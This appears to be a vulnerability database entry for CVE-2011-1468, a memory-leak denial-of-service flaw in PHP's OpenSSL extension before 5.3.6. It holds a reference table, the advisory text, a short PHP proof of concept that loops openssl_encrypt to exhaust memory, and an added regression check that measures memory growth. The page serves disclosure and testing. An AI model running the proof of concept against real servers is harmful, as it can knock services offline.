PHP 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Memory Leak Do
Reporter | Title | Published | Family |
---|---|---|---|
Veracode | Denial Of Service (DoS) | 10 Apr 2020 01:03 | veracode |
seebug.org | PHP "OpenSSL" Extension Multiple Denial-of-Service Vulnerabilities | 27 Mar 2011 00:00 | seebug |
UbuntuCve | CVE-2011-1468 | 19 Mar 2011 00:00 | ubuntucve |
CVE | CVE-2011-1468 | 20 Mar 2011 02:00 | cve |
Prion | Design/Logic Flaw | 20 Mar 2011 02:00 | prion |
NVD | CVE-2011-1468 | 20 Mar 2011 02:00 | nvd |
Cvelist | CVE-2011-1468 | 20 Mar 2011 01:00 | cvelist |
Exploit DB | PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service | 8 Mar 2011 00:00 | exploitdb |
OpenVAS | RedHat Update for php53 and php RHSA-2011:1423-01 | 3 Nov 2011 00:00 | openvas |
OpenVAS | CentOS Update for php53 CESA-2011:1423 centos5 i386 | 3 Nov 2011 00:00 | openvas |
source: https://www.securityfocus.com/bid/46977/info
PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.
Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.
Versions prior to PHP 5.3.6 are vulnerable.
```php
<?php
// Proof of concept from the advisory: repeated openssl_encrypt() calls.
// On affected versions each call leaks memory, so the process grows steadily.
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i = 0; $i < $maxi; $i++) {
    // 'des3' cipher, raw_output = false, 8-byte IV
    openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1) - $t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>
```
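A regression check for the leak described above, as an added example that is not part of the original advisory: it runs `openssl_encrypt` in batches and exits non-zero if the process's resident memory keeps growing after a warm-up batch. The `/proc/self/status` read (Linux only), the helper names, the batch sizes and the 1 MiB tolerance are assumptions.

```php
<?php
// Added example, not part of the advisory. Assumptions: Linux /proc is
// mounted; batch size, round count and tolerance are arbitrary choices.

// Resident set size of this process in KiB, or null when unreadable.
function rss_kib()
{
    $status = @file_get_contents('/proc/self/status');
    if ($status !== false && preg_match('/^VmRSS:\s+(\d+)\s+kB/m', $status, $m)) {
        return (int) $m[1];
    }
    return null;
}

// Encrypt in batches, sampling RSS after each. Batch 0 is warm-up (cipher
// setup, allocator pools), so growth is measured from its sample onward.
function rss_growth_kib($rounds, $batch)
{
    $data = str_repeat('A', 160);   // constructed plaintext
    $pass = 'constructed-test-key'; // constructed key
    $iv   = '12345678';             // 8-byte IV for 'des3'
    $samples = array();
    for ($r = 0; $r <= $rounds; $r++) {
        for ($i = 0; $i < $batch; $i++) {
            if (openssl_encrypt($data . $i, 'des3', $pass, 0, $iv) === false) {
                return null; // cipher unavailable: nothing was exercised
            }
        }
        $samples[] = rss_kib();
    }
    if (in_array(null, $samples, true)) {
        return null;
    }
    return $samples[$rounds] - $samples[0];
}

$rounds = 5;
$batch = 20000;
$limitKib = 1024; // tolerated growth after warm-up

$growth = rss_growth_kib($rounds, $batch);
if ($growth === null) {
    fwrite(STDERR, "could not measure: need Linux /proc and a working 'des3' cipher\n");
    exit(2);
}
printf("PHP %s: RSS grew %d KiB over %d calls\n", PHP_VERSION, $growth, $rounds * $batch);
exit($growth > $limitKib ? 1 : 0);
```

Resident set size is sampled rather than `memory_get_usage()` so that memory allocated outside PHP's own allocator is also counted.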